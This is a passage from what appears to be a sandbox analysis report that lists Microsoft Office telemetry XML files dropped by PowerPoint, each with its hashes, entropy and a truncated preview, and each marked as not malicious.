                                                                                                                              SSDEEP:12:TMHd5cKOCP+ygAQjerCyOXAf8t/nHNO2su:2dCKZntrFOQEtF
                                                                                                                              MD5:E5A10F69B917993CD34B2180C080C07B
                                                                                                                              SHA1:6019CDCBE153ED4B4B6E55546EADD49295D1EA4B
                                                                                                                              SHA-256:6ED92D269AA9DC5E4F4BC39B041C80FEE2DD43A5142929C42493B086CFE92DD6
                                                                                                                              SHA-512:7EDEE134CB2F3307508E1103B167BA7B1BE74555BC7CEEE0B2A47E374E281B2575FC79D34C0698EFF60AA8929A24750E35FFF8BA8F8A6E97B50ADCE3149EADAF
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="360001" V="3" DC="SM" EN="Office.Compliance.FileFormatBallotOption" ATT="7027c5657baa4c8c94c98ed600467c8c-81874f32-dbc1-42fc-b25b-12494e65c25f-7401" SP="CriticalBusinessImpact" DL="B" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="4qcpo" A="a70rj" />.. </S>.. <C T="U32" I="0" O="false" N="FileFormatBallotSelectedOption">.. <S T="1" F="Option" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):529
                                                                                                                              Entropy (8bit):5.2598361101997035
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd5UAlkYL0OCHsC4Bf7tSPshsSs0FUHpnGpCdx2cUSwnnqxy0UW5yNOn2sby:TMHd51NCk7gkVigA5UdyUkyNO2su
                                                                                                                              MD5:1600A71BD70E14301AB7A9EE2CEC1F20
                                                                                                                              SHA1:D7FAB688A1C504AEF53AB6AE8FD88A5B1C45BEE2
                                                                                                                              SHA-256:F90920017C41A02E28F38ACA67FC0E0A6F88812411E62EFB90945959D26834C6
                                                                                                                              SHA-512:E2E6D4B1A1DE326CB785C2D1D636A3CEF7693A53025509317E43C04ECC1B3ED7EF1361BD31AE99FF9E5E5DBFF4C848BB42FAAFAED920E4801B54C641826C8B42
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="370000" V="1" DC="SM" EN="Office.TargetedMessaging.TmsWarningCategoryPassthrough" ATT="2f0a1931898144668b4994b491868b75-cc9fb197-8766-4b63-8e07-1887d3d330ac-7107" DCa="PSU" xmlns="">.. <S>.. <UCSS T="1" C="TargetedMessagingService" S="Monitorable" />.. </S>.. <C T="W" I="0" O="false" N="ULS_TagId">.. <S T="1" F="ULS_TagId" />.. </C>.. <C T="G" I="1" O="false" N="ULS_CorrelationID">.. <S T="1" F="ULS_CorrelationID" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2270
                                                                                                                              Entropy (8bit):4.715233540446112
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dXcMkbrMrnrBrVhrZrLrx+pJt396fHk1xY/S7D8J1Ux54AN/RidGXH7E8/Nytt7:cXKbwj1DlXcpJJwL2LUdGrtu7
                                                                                                                              MD5:6A71752B53BED541A5AD6CA10FF13B16
                                                                                                                              SHA1:A8FF44ED3F41A96C7391985C45D8B06E96FE1784
                                                                                                                              SHA-256:071A5F17C0031096ECC814CF5D355FCB8FEB32EA797DFC4B50FECD5BCCCE3F69
                                                                                                                              SHA-512:F026E8C9F9EFB878014773A2C98E6FF4319F0EDAACE3EF0FC2DC30C5A8F943F96688DAF15531AF243FA3FD0CDFA92EFFBE841E7526268F5C9559C16FDC2DC674
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="370001" V="2" DC="SM" EN="Office.TargetedMessaging.TmsGetMessageWebCall" ATT="2f0a1931898144668b4994b491868b75-cc9fb197-8766-4b63-8e07-1887d3d330ac-7107" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="a70w0" />.. <UTS T="2" Id="a70xq" />.. <UTS T="3" Id="a70w1" />.. <UTS T="4" Id="a70w2" />.. <UTS T="5" Id="a70w3" />.. <UTS T="6" Id="a70yv" />.. <UTS T="7" Id="a70x9" />.. <TI T="8" I="30s" />.. <A T="9" E="TelemetrySuspend" />.. <A T="10" E="TelemetryShutdown" />.. </S>.. <G>.. <S T="1">.. <F N="Thread ID" />.. </S>.. <S T="2">.. <F N="Thread ID" />.. </S>.. <S T="3">.. <F N="Thread ID" />.. </S>.. <S T="4">.. <F N="Thread ID" />.. </S>.. <S T="5">.. <F N="Thread ID" />.. </S>.. <S T="6">.. <F N="Thread ID" />.. </S>.. <S T="7">.. <F N="Thread ID" />.. </S>.. </G>.. <C T="W" I="0" O="false" N="Source">.. <S T="1" F="Source" />..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):5775
                                                                                                                              Entropy (8bit):4.069718902007382
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:SSY1Q4Qr3QbQrrVQ2QrnQJQrY1QHQKVsbkddl47:udM6OHsUn1Yrsbki7
                                                                                                                              MD5:3067F25E37A6C69AA28B2D32344E20E9
                                                                                                                              SHA1:C8124BD5E0106D66C789F68FB988A69C6501A7F3
                                                                                                                              SHA-256:A187BF75D127D56697E2D25ACDAB300F3DA30B686B4B45AABF0139520E14C8C0
                                                                                                                              SHA-512:A0BE7E3E83C744BD953D55ECDA6010F16CD9F60006C0B26D6D3AD177F695A610DAC6D5A2CB8DE82C61BB683857B1E147D281F416C8D2FA7D2D02347E941FC007
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="370002" V="2" DC="SM" EN="Office.TargetedMessaging.TmsBusBarInteraction" ATT="2f0a1931898144668b4994b491868b75-cc9fb197-8766-4b63-8e07-1887d3d330ac-7107" S="1" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="a70xu" />.. <UTS T="2" Id="a70y2" />.. <UTS T="3" Id="a8smq" />.. <UTS T="4" Id="a8smr" />.. <UTS T="5" Id="a8sms" />.. <UTS T="6" Id="a4673" />.. <UTS T="7" Id="a468a" />.. <UTS T="8" Id="a5ri9" />.. <UTS T="9" Id="a5ri8" />.. <UTS T="10" Id="a4679" />.. <UTS T="11" Id="a70w5" />.. <A T="12" E="TelemetrySuspend" />.. <A T="13" E="TelemetryShutdown" />.. <F T="14">.. <O T="EQ">.. <L>.. <S T="1" F="MessageKey: Source" />.. </L>.. <R>.. <V V="BizBar" T="W" />.. </R>.. </O>.. </F>.. <F T="15">.. <O T="AND">.. <L>.. <O T="GE">.. <L>.. <S T="6" F="PartType" />.. </L>.. <R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1120
                                                                                                                              Entropy (8bit):4.86938725236406
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dyaMkbrkrMxYrtnTZZlHgN0oEKPkl7cF7:cysbYwxYBnTRgZTMqF7
                                                                                                                              MD5:B3378EB31B57659DAFD13EBFC878DAAF
                                                                                                                              SHA1:2E6F1C6CE274C233853672D061E40A9A572A1689
                                                                                                                              SHA-256:32A09C10658D25D232C5AD2964DAE98718A7D9D7A9B1D855DCB855108A3084D1
                                                                                                                              SHA-512:DEE6C8B4CBF9B8D7B2E5FBB20327E3D4E2268FE7F8A40544B2E0F5C4AEE4B0834769D8BAE94169D9CD9953B917B93B05EDC320BDF866B0C5B5EF77956327738B
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="370005" V="1" DC="SM" EN="Office.TargetedMessaging.TmsOutSpaceIteration" ATT="2f0a1931898144668b4994b491868b75-cc9fb197-8766-4b63-8e07-1887d3d330ac-7107" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="a70xu" />.. <UTS T="2" Id="babnb" />.. <UTS T="3" Id="babna" />.. <F T="4">.. <O T="EQ">.. <L>.. <S T="1" F="MessageKey: Source" />.. </L>.. <R>.. <V V="OutSpace" T="W" />.. </R>.. </O>.. </F>.. <A T="5" E="TelemetrySuspend" />.. <A T="6" E="TelemetryShutdown" />.. </S>.. <C T="I32" I="0" O="true" N="MessageId">.. <S T="4" F="MessageHeader: MessageId" M="Ignore" />.. </C>.. <C T="W" I="1" O="true" N="TransactionId">.. <S T="4" F="MessageHeader: TransactionId" M="Ignore" />.. </C>.. <C T="U32" I="2" O="false" N="OutSpaceMessageShowCount">.. <C>.. <S T="2" />.. </C>.. </C>.. <C T="U32" I="3" O="false" N="OutSpaceButtonClickCount">.. <C>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):786
                                                                                                                              Entropy (8bit):4.983569627399716
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd5+A4Cwa7gkVierPb/erM4ert5BjEa/s8CnXXHaSMpqyXHISMNO3XGHNUlu:2dcNaMkbrPSrMfrtDF/2dya7
                                                                                                                              MD5:D59BE6A15F4F52FFB398D8234259A54B
                                                                                                                              SHA1:E1079B645E25C7F50D0A63EB041F0D37C1B7766C
                                                                                                                              SHA-256:302C85D5F8568637AC2466274D58526155DE96F124A8B9255124FE210C02FB09
                                                                                                                              SHA-512:ECCF2F41182C00A815B4D374A32E0021684913D64F76ED6D846B398E717802AE17CFC5345E029A4053AE1DBA36D3BB89D15185F8D91EBFC3394E73C8E6A8E70C
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="370006" V="0" DC="SM" EN="Office.TargetedMessaging.AutoRenewIteration" ATT="2f0a1931898144668b4994b491868b75-cc9fb197-8766-4b63-8e07-1887d3d330ac-7107" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="ban9c" />.. <UTS T="2" Id="ban9h" />.. <UTS T="3" Id="ban9a" />.. <A T="4" E="TelemetrySuspend" />.. <A T="5" E="TelemetryShutdown" />.. </S>.. <C T="W" I="0" O="true" N="HardwareId">.. <S T="2" F="HardwareId" M="Ignore" />.. </C>.. <C T="U32" I="1" O="false" N="AutoRenewShowCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="U32" I="2" O="false" N="AutoRenewClickCount">.. <C>.. <S T="3" />.. </C>.. </C>.. <T>.. <S T="4" />.. <S T="5" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3344
                                                                                                                              Entropy (8bit):4.7725483241132505
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:cFcEKUGge6phZjFjeYr3LnzXmLJf5Mo6ws3gDnsUFXYyV50g7XkW3487:OctMoFdHxp7
                                                                                                                              MD5:3CB447145158C2A33617B04F567D4B47
                                                                                                                              SHA1:98DD266850A1AA5A372830B727BA95269D078092
                                                                                                                              SHA-256:411FE601F852DED1A67AF9A9363DD03C1CEC74F5C07585D4049A47A3499EA4C5
                                                                                                                              SHA-512:202EFCFED6B0559BB1E135EA18D503D051B7154FF42D06ED43E41ECE7A923D582401ABE651EF7E0EC215F8B784B690B48CFECE505422695C3EFB69DE784C233F
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="370007" V="3" DC="SM" EN="Office.TargetedMessaging.EnsureCached" ATT="2f0a1931898144668b4994b491868b75-cc9fb197-8766-4b63-8e07-1887d3d330ac-7107" SP="CriticalExperimentation" DL="B" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bjxcp" />.. <UTS T="2" Id="bjp68" />.. <UTS T="3" Id="bjp69" />.. <UTS T="4" Id="bjp7a" />.. <UTS T="5" Id="bjp7b" />.. <UTS T="6" Id="bjp7l" />.. <UTS T="7" Id="bjp7m" />.. <UTS T="8" Id="bjp7n" />.. <UTS T="9" Id="bjp7o" />.. <UTS T="10" Id="bjp7q" />.. <UTS T="11" Id="bjp7r" />.. <UTS T="12" Id="bjp7s" />.. <UTS T="13" Id="bjp7t" />.. <UTS T="14" Id="bjp7u" />.. <UTS T="15" Id="bjp7v" />.. <UTS T="16" Id="bjp7w" />.. <UTS T="17" Id="bjp7x" />.. <UTS T="18" Id="bjp7y" />.. <TO T="19" I="1min">.. <S T="1" />.. </TO>.. <A T="20" E="TelemetrySuspend" />.. <A T="21" E="TelemetryShutdown" />.. </S>.. <C T="U32" I="0" O="false" N="EnsureCached">..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):627
                                                                                                                              Entropy (8bit):5.136223556840137
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd5Bvy07gkVierSjBiMfEIiwxP0diMfAGjdiwxdyc/yNOqHNUlu:2dS0Mkbry8iO7ljrr9o7
                                                                                                                              MD5:C8534E28E00809D5967ED1A5A4702C71
                                                                                                                              SHA1:69496E8B4AB66EDB7FB2A73BE3CBB80123DA0378
                                                                                                                              SHA-256:8AE5995B64CE2154CCBC0FDD0D01DEF855195767D118D753E3945D68A1BEE4EA
                                                                                                                              SHA-512:D7CEB2E2B32E1306AD0201B79DC55C25D41EC077813E629DD5B44DAF0E21C17F5A8EC4E5E4879DD02244E00DB09233E74098D26E5D878802340497C2ACBF4FBF
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="370009" V="0" DC="SM" EN="Office.TargetedMessaging.BusbarThemeSelectionStatus" ATT="2f0a1931898144668b4994b491868b75-cc9fb197-8766-4b63-8e07-1887d3d330ac-7107" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bp5hd" />.. </S>.. <C T="I32" I="0" O="false" N="ExpectedThemeType">.. <S T="1" F="ExpectedThemeType" />.. </C>.. <C T="I32" I="1" O="false" N="ActualThemeType">.. <S T="1" F="ActualThemeType" />.. </C>.. <C T="W" I="2" O="false" N="Description">.. <S T="1" F="Description" />.. </C>.. <T>.. <S T="1" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):857
                                                                                                                              Entropy (8bit):5.036697503394607
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd5qrC07gkV2ws1SEernKMS0E7WNoSdR/SpidydtlImX/MDd+DrVJd3w7uX9kN:2dIBMkds1KrAsbRMyGKh+3Jg7utM
                                                                                                                              MD5:6168B63FE8A00FAF98CD2DEA54F6ADB1
                                                                                                                              SHA1:40D21CDA5156E68EEFA7BCD2A2E4E1863AD0B08A
                                                                                                                              SHA-256:A9C296543A66C08E90E201647DC1F5780EEDD78E43DF3FEBBE3EF11E259F34A8
                                                                                                                              SHA-512:0F3A2BB8D60AAB8B4682D72BC28E2BDF46DF2BA14BA65064E0AE5AF11EFB3E483D27414BBF7C2CA2D5DD6A2B4D6AEC49B6E232B8E80A4F5CCD04256098E4CBDB
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="370011" V="1" DC="SM" EN="Office.TargetedMessaging.ABExperimentMessageTrigger" ATT="2f0a1931898144668b4994b491868b75-cc9fb197-8766-4b63-8e07-1887d3d330ac-7107" SP="CriticalExperimentation" DL="B" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bpt5h" />.. </S>.. <C T="W" I="0" O="false" N="Surface">.. <S T="1" F="Surface" />.. </C>.. <C T="W" I="1" O="false" N="Flight">.. <S T="1" F="Flight" />.. </C>.. <C T="W" I="2" O="false" N="CampaignId">.. <S T="1" F="CampaignId" />.. </C>.. <C T="I32" I="3" O="false" N="MessageId">.. <S T="1" F="MessageId" />.. </C>.. <C T="W" I="4" O="false" N="TransactionId">.. <S T="1" F="TransactionId" />.. </C>.. <C T="W" I="5" O="true" N="TriggerPoint">.. <S T="1" F="TriggerPoint" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):398
                                                                                                                              Entropy (8bit):5.264707739167976
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd5lvkY+1xxqsC4Bf7tSPshsSs0FUHperhHzFFCx7IwLKBsfUSFNOn2sby:TMHd5t277gkVierFFFGfUINO2su
                                                                                                                              MD5:179827349E5E56D5A69154DB28A2F49C
                                                                                                                              SHA1:940C086DB82F6BD002F03D8DE08529502497B7D3
                                                                                                                              SHA-256:EFA1B4E75F35A2815616E0EBF5C10B486E9AF498726998D9310D459D21A464D6
                                                                                                                              SHA-512:B7850FF106963994A0E8B75E4D19D9611E3764ECB9DDAADB55628C85583B161DBB5151229A3A720E2262E4C78BAA15ACD7F5863E119C182F2530B8D4B060ECF1
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="370012" V="0" DC="SM" EN="Office.TargetedMessaging.UnsupportedIdentityType" ATT="2f0a1931898144668b4994b491868b75-cc9fb197-8766-4b63-8e07-1887d3d330ac-7107" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bsg4m" A="bsg4l" />.. </S>.. <C T="TAG" I="0" O="false" N="EventId">.. <S T="1" F="ULS_Tag" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3282
                                                                                                                              Entropy (8bit):4.509322215022879
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:c8NZ16WZ3FwW9ua3t72AYvLdqG1rdmq0kvmvaclGRwAV:1LtyQErT9heGRwAV
                                                                                                                              MD5:DC556473D3032FBF184301545F929DD8
                                                                                                                              SHA1:4F208F54E00984A01E2040D7B1EC19DB2A159F4C
                                                                                                                              SHA-256:0C5CD23D2ECA1FFB28FF2921DDB63030685B481BCCFE0FD61C2792691F11B755
                                                                                                                              SHA-512:8908EB81FAD1B37414F1252F6EB71A8455C368FE5B68372A8129F67C5567652F43BE933E76F9596CD2C8833D6C37B1330FED447E9375B00BB8E3502461B06C82
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="390004" V="3" DC="SM" EN="Office.Wildfire.CanvasDeprovisionedDialog" ATT="350d24c16a934c2d9734791ed7301d8e-73bafc90-ca43-424c-815a-63b076120b49-6725" SP="CriticalExperimentation" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="ckyjo" />.. <UTS T="2" Id="ckyjp" />.. <UTS T="3" Id="ckyjq" />.. <UTS T="4" Id="ckyjg" />.. <UTS T="5" Id="cu6t1" />.. <UTS T="6" Id="ckyjf" />.. <UTS T="7" Id="ckyjh" />.. <UTS T="8" Id="ckyje" />.. <UTS T="9" Id="ckyji" />.. <UTS T="10" Id="ckyjk" />.. <UTS T="11" Id="ckyjj" />.. <UTS T="12" Id="ckyjl" />.. <UTS T="13" Id="ckyjn" />.. <UTS T="14" Id="ckyjm" />.. <F T="15">.. <O T="EQ">.. <L>.. <S T="4" F="IsGateEnabled" />.. </L>.. <R>.. <V V="True" T="B" />.. </R>.. </O>.. </F>.. <F T="16">.. <O T="EQ">.. <L>.. <S T="4" F="IsGateEnabled" />.. </L>.. <R>.. <V V="Fal
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):449
                                                                                                                              Entropy (8bit):5.297798715342976
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd5XJXA+NZ1S4Hs14WnervAlNEu2uNO2su:2dTXtNZ17Hs1WrvAlavu
                                                                                                                              MD5:21F035AAAA21E9B919920690017E1043
                                                                                                                              SHA1:65BC7C9EC7481F390F84BB89D187E58C8C63119C
                                                                                                                              SHA-256:06D994B675B0DB4AEE7D8FD325993ACEB1546217A59D8FF86B962A90AA096109
                                                                                                                              SHA-512:C869874DFEA611D2C55FF752581F70B4A677DD731188585B9123FFB579772FDC955FB83E475BCB2D43DB39F6E8BF1F926C1AB86685B1CB3A7684D750D28FA322
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="390005" V="1" DC="SM" EN="Office.Wildfire.CanvasDialogResiliency" ATT="350d24c16a934c2d9734791ed7301d8e-73bafc90-ca43-424c-815a-63b076120b49-6725" SP="CriticalExperimentation" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="b36lp" />.. </S>.. <C T="W" I="0" O="falseNoError" N="ResiliencyExperience">.. <S T="1" F="ExperienceLoaded" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1997
                                                                                                                              Entropy (8bit):4.962466047797236
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dAFcFwTS30cq3P5s5GkWhbhScX8h3fUc+FfT+Nc0KN0oOBzBB:cCOwTs0JRQGRFyMpiFB
                                                                                                                              MD5:D7DF0C81AF59C7EFFE06CEB8CD133843
                                                                                                                              SHA1:4BFDD306EB8FE0638E6437F44DC841B32CB55E7F
                                                                                                                              SHA-256:F0AD740F5DCB2AEA86AAD20083E7434AC09369DD6BBBCBC58DBC6547A4B70E7B
                                                                                                                              SHA-512:5B6DB178A4DFB132E55794FFBD47B9E40BDC192419DF916CA1A5910DD248C6644E598F2AE60A62E31EBCB9955EEA00ED62C29B3CA5416661B531C9B6F2828544
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="440000" V="3" DC="SM" EN="Office.Charting.ActivityUnaggregatedCharting" ATT="8984684171524f0c86ea1d654968b2c4-7399462d-cac4-4abd-abdd-d14d00d89e06-7783" DCa="PSU" xmlns="">.. <RIS>.. <RI N="ActivityInstance" />.. </RIS>.. <S>.. <UCSS T="1" C="Charting" S="Medium" />.. </S>.. <C T="FT" I="0" O="false" N="CollectionTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="B" I="1" O="false" N="WasSuccessful">.. <S T="1" F="Success" />.. </C>.. <C T="I32" I="2" O="true" N="ErrorCode">.. <S T="1" F="ErrorCode" M="Ignore" />.. </C>.. <C T="W" I="3" O="false" N="LogScopeName">.. <S T="1" F="ScopeName" />.. </C>.. <C T="TAG" I="4" O="false" N="ULS_Tag">.. <S T="1" F="ULS_Tag" />.. </C>.. <C T="W" I="5" O="true" N="ParentScenarioName">.. <S T="1" F="ParentScenarioName" M="Ignore" />.. </C>.. <C T="TAG" I="6" O="true" N="ParentScenarioTag">.. <S T="1" F="ParentScenarioTag" M="Ignore" />.. </C>.. <C T="U32"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):451
                                                                                                                              Entropy (8bit):5.3318799789319815
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd0kMYG0XwNZoQSJIccJI0PFRMFpAQ/CCHperhKjxPVCIJA+/LylNOn2sby:TMHdGYGuHJhhOSAQjerGlVZ6NO2su
                                                                                                                              MD5:A59982F2C8F965DDC0E418C5F63C85CA
                                                                                                                              SHA1:26E421CDE611E5668CBCD38F8721E424ABCCDC7B
                                                                                                                              SHA-256:E76D462BFDABED81BE2E5E519B7FA50866B567A06E5B72F1AAE9AE4A1445F03E
                                                                                                                              SHA-512:744AF64C8DF82D6151E60678DBE90CFD522D9970C633498451FD7836D1E6A27E9148F3C41AB9DB70CCE3F3E6EAE0D8F035A58DFD152749637156D8F39027DFD0
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="460008" V="0" DC="SM" EN="Office.AppCompat.AppCompat.TelemetryDashboardResiliencyCrashLog" ATT="e35e38bb2f4e4141ba082f2262aa1b83-99b9fe95-327d-4155-8e27-1fdb3db29202-7299" SP="CriticalBusinessImpact" DL="B" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="cc3sg" />.. </S>.. <C T="FT" I="0" O="false" N="CollectionTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):418
                                                                                                                              Entropy (8bit):5.258553972975612
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd1YgJhhOSAQjerTbNlVfsXUTxNO2su:2d1Y4v2rTbNPfL7
                                                                                                                              MD5:505819EC80245284DCA3686F2939C99B
                                                                                                                              SHA1:72F1A3795039A68FBCA89FE7AAF15B131C8033C4
                                                                                                                              SHA-256:DFE5850D46A27E0F8FCEA22F8189967DFE56333997825BEE4E9ECF633EA158DD
                                                                                                                              SHA-512:AFA03C10FFAFD4E26159D0EFC5636C2A6B0CE8D746B467258C4E2C75DB709705A50A35E946B8F46ED24740231894A30FF292D9C5FC8BB81A58E83891B449F73A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="460009" V="0" DC="SM" EN="Office.AppCompat.AppCompat.AgentUpload" ATT="e35e38bb2f4e4141ba082f2262aa1b83-99b9fe95-327d-4155-8e27-1fdb3db29202-7299" SP="CriticalBusinessImpact" DL="B" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="db90i" />.. </S>.. <C T="FT" I="0" O="false" N="UploadTime">.. <S T="1" F="UploadTime" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1094
                                                                                                                              Entropy (8bit):4.957729381051681
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd9jX9GgeKPQjP5iACeroHf/xoW+tN5lOyX/c//KNpON2feIdLWt8Oj8kdy9WG:2d9T9oKPoiA1roEtvJ2ekrHo+G
                                                                                                                              MD5:D92F43729F9C8FA4B66450542AAA9134
                                                                                                                              SHA1:AD2777B81653B872ECD56569699EC9266A80247F
                                                                                                                              SHA-256:BF78477A441E833D1B29FB94ED0E598C92D399FBE99C797C98988FFF1404AEBB
                                                                                                                              SHA-512:FC79AC40E233E8A222FF378F34204CABA7AB273E8A9CE04AFA08EAC35674C3F1DADB71D9C8701243473975D18C102EAF8406C77D86860B62FEDE222A5564A29D
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="490002" V="13" DC="SM" EN="Office.Feedback.Survey.FloodgateClient.UserSelected" ATT="d79e824386c4441cb8c1d4ae15690526-bd443309-5494-444a-aba9-0af9eef99f84-7360" T="Upload-Medium" DL="B" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bl583" A="b7zlb c2gwh c2gvz c2g5u dciwy dciw5" />.. <SR T="2" R="^......">.. <S T="1" F="SurveyId" />.. </SR>.. <F T="3">.. <O T="NE">.. <L>.. <S T="2" F="Matched" />.. </L>.. <R>.. <V V="Banner" T="W" />.. </R>.. </O>.. </F>.. </S>.. <C T="TAG" I="0" O="false" N="EventId">.. <S T="3" F="ULS_Tag" />.. </C>.. <C T="W" I="1" O="true" N="SurveyFeatureName">.. <S T="3" F="SurveyFeatureName" M="Ignore" />.. </C>.. <C T="W" I="2" O="true" N="SurveyId">.. <S T="3" F="SurveyId" M="Ignore" />.. </C>.. <C T="W" I="3" O="true" N="ExpirationUTC">.. <S T="3" F="ExpirationUTC" M="Ignore" />.. </C>.. <C T="W" I="4" O="true" N="Uniqu
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
